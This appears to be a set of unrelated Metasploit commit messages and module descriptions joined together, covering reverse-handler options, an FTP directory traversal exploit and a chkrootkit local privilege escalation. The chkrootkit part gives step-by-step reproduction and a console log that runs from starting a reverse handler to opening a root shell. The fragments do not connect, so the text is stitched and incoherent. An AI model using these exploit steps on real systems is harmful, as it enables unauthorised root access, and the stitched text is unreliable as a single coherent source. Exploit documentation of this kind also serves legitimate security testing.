output from the mssql_local_auth_bypass module
is now prefixed with the Session id and address
of the target host so it is explicitly clear
where it is performing each action
Pass in the "lhost" and "lport" options to the default transport during the native payload. This takes the following LHOST priorities:
1. OverrideLHOST, only if OverrideRequestHost is TRUE
2. The request Host: header.
3. The LHOST datastore.
Default transport request should set the priority to the Host: request header, and the subsequent OverrideRequestHost, OverrideLHOST, and OverrideLPORT options in the handler for reverse_http(s).
This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//
:template by default is just the base name of the file, not the
fullname. Before we use it, we need to normalize it. Methods
in this class rely on set_template_default for normalization (
which can also handle a custom path), so we'll just use that too.
This modules implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.
Its main issues is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h top with its default setup.
How to reproduce:
1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.
[*] Started reverse handler on
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened ( -> at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
uid=0(root) gid=0(root) groups=0(root)